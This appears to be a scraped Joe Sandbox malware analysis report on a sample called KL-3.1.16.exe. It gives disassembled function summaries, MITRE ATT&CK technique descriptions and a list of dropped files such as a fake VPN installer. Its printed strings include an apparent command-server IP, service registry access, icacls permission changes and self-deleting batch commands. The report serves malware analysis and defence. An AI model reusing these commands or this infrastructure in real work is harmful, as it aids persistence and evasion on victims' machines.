Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileOpenwsprintf$AttributesCloseDownloadErrorLastQueryValue
String ID: c:\%s
API String ID: 2251979229-3279930864
Opcode ID: 4dc0e496c5411805bbdd34b048525c4a6c2d00c69d795ee935723dda855a5618
Instruction ID: d31b4f8b446d15c009da9ac5b615a896d3a7646ef46483cc8dc5a1e5896f3638
Opcode Fuzzy Hash: 4dc0e496c5411805bbdd34b048525c4a6c2d00c69d795ee935723dda855a5618
Instruction Fuzzy Hash: 8E112C72A143257AFBE0B7B4DC88FEB779CDF08350F640465F72AE1041EA75DA4586A0

Function 06CF708C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,06CF6C72,?,?,?,143.92.60.116), ref: 06CF70E9

Strings

SYSTEM\CurrentControlSet\Services\, xrefs: 06CF70B3
143.92.60.116, xrefs: 06CF709C

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Open
String ID: 143.92.60.116$SYSTEM\CurrentControlSet\Services\
API String ID: 71445658-1514337928
Opcode ID: 49d1f2002afdf2832880f8bfb76f590e2d3bd793bf79b2959cbfba6bce5ce21c
Instruction ID: 62dc1738b1f73f8a2b90042dd7abe67cec60eeb30ffa8057349e64da8f7da17e
Opcode Fuzzy Hash: 49d1f2002afdf2832880f8bfb76f590e2d3bd793bf79b2959cbfba6bce5ce21c
Instruction Fuzzy Hash: 77F08276A98258BAEBE0D6B4DC06FE9B36C9714700F1004A1A389F1081EEF4A6C89A15

Function 00C01280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00C01285

Part of subcall function 00C03A15: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C03A21

___std_exception_copy.LIBVCRUNTIME ref: 00C012AE

Strings

string too long, xrefs: 00C01280

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: 3b7ffd241e389865b68989718162bc77b00095c4d5c1cb10847588bc667af8ec
Instruction ID: 0a36555aa6b1c72e2d75bfe4b3cf13694f784ddc906c2575458659a22f773d0d
Opcode Fuzzy Hash: 3b7ffd241e389865b68989718162bc77b00095c4d5c1cb10847588bc667af8ec
Instruction Fuzzy Hash: 54E0C2B2A1032957CA10EFD8EC01882B7DCDE16B107148626FA84E7A01FAB0A590E3A5

Function 06CF3FAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6processCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF3DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 06CF3E0C
Part of subcall function 06CF3DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06CF3E14
Part of subcall function 06CF3DF2: DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF3E1B
Part of subcall function 06CF3DF2: Sleep.KERNEL32(c:\del,?,?), ref: 06CF3E38
Part of subcall function 06CF3DF2: Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF3E4B
Part of subcall function 06CF3DF2: WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 06CF3E53
Part of subcall function 06CF3DF2: Sleep.KERNEL32(000003E8,?,?), ref: 06CF3E5A
Part of subcall function 06CF3DF2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 06CF3E6A
Part of subcall function 06CF3DF2: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 06CF3E83
Part of subcall function 06CF3DF2: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 06CF3E9A

WinExec.KERNEL32(cmd /c echo.>c:\del & exit,00000000), ref: 06CF3FBA
ExitProcess.KERNEL32 ref: 06CF3FC2

Strings

cmd /c echo.>c:\del & exit, xrefs: 06CF3FB5

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Exec$Sleep$FileName$DeleteEnvironmentExitModulePathProcessShortVariable
String ID: cmd /c echo.>c:\del & exit
API String ID: 253100718-3921158289
Opcode ID: 610446362fe00e9e673e6a9914c23c65df6c5358a44222e91b2285250bbba8ab
Instruction ID: 6c1dbae9ccb5a4ea91221ca66507efbbba127c89a151c5cb6ca7028608ec2722
Opcode Fuzzy Hash: 610446362fe00e9e673e6a9914c23c65df6c5358a44222e91b2285250bbba8ab
Instruction Fuzzy Hash: CAB002353A5256FBF2E127B0AC4FF197B11A744B02F549844F31A5C6D1CDD054085755

Function 06CFF4EE Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,06CFF2B6,00000000,00000000,00000000,06CFAD29,00000000,00000000,06CF8D56,00000000,00000000,00000000), ref: 06CFF516
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,06CFF2B6,00000000,00000000,00000000,06CFAD29,00000000,00000000,06CF8D56,00000000,00000000,00000000), ref: 06CFF54A
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 06CFF564
HeapFree.KERNEL32(00000000,?), ref: 06CFF57B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: c6017f1a950095ad9eaae27fca8d4c7659dcb315041e4890acf3ce0486187482
Instruction ID: 2e5d4d25af18cf42780c38e9e6686d27e26e25df37c7d27f1d327acb65dd614d
Opcode Fuzzy Hash: c6017f1a950095ad9eaae27fca8d4c7659dcb315041e4890acf3ce0486187482
Instruction Fuzzy Hash: 66114C70A002069FDBB08F19EC45E667BB7FB947107108A1DF362D6AE0DB709589DB00

Function 06D0C9FF Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(06D26740,?,00000000,?,?,06D0C8E5,00000010,?,00000100,?,?,?,06D0C4A4,06D0C4EB,06D0C4D2,06D087DA), ref: 06D0CA3A
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,06D0C8E5,00000010,?,00000100,?,?,?,06D0C4A4,06D0C4EB,06D0C4D2,06D087DA), ref: 06D0CA4C
LeaveCriticalSection.KERNEL32(06D26740,?,00000000,?,?,06D0C8E5,00000010,?,00000100,?,?,?,06D0C4A4,06D0C4EB,06D0C4D2,06D087DA), ref: 06D0CA55
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,06D0C8E5,00000010,?,00000100,?,?,?,06D0C4A4,06D0C4EB,06D0C4D2,06D087DA,00000100), ref: 06D0CA67

Part of subcall function 06D0C9BA: GetVersion.KERNEL32(?,06D0CA0F,?,06D0C8E5,00000010,?,00000100,?,?,?,06D0C4A4,06D0C4EB,06D0C4D2,06D087DA,00000100,06D08773), ref: 06D0C9CD

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 7cc5987540b8855c172e1d8764325526c92c54b3dd624e6a417093bd5eba6e0f
Instruction ID: a709ed12b1ecc754cb4b044cb4ec433a873ce052abfa134851d39b48e9fdd4e5
Opcode Fuzzy Hash: 7cc5987540b8855c172e1d8764325526c92c54b3dd624e6a417093bd5eba6e0f
Instruction Fuzzy Hash: C9F0877181139BDFE760EFA4F8C4E42B3AAFB24316B50053AE71682241D730E44ACAA1

Function 06CFCF5F Relevance: 5.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,06CFCD22,?,06CFB623), ref: 06CFCF6C
InitializeCriticalSection.KERNEL32 ref: 06CFCF74
InitializeCriticalSection.KERNEL32 ref: 06CFCF7C
InitializeCriticalSection.KERNEL32 ref: 06CFCF84

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: e9a6c4258116c78bd89877c3dc5521149ac148823ba4628a4cdb2ce8a5c4daf7
Instruction ID: 68d6e0bf7bc0e44eaccde8bceef19964f19924f8a7dafe0fca9d43873ea60d62
Opcode Fuzzy Hash: e9a6c4258116c78bd89877c3dc5521149ac148823ba4628a4cdb2ce8a5c4daf7
Instruction Fuzzy Hash: E0C00231C05178BBCB592B55FC148457F67EB443603114172EB0455270C6B11D12DFC1

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KL-3.1.16.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\product1\letsvpn-latest.exe

C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Program\ziliao.jpg

C:\ProgramData\Program\iusb3mon.exe

C:\ProgramData\mntemp

C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe

Windows Analysis Report
KL-3.1.16.exe

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
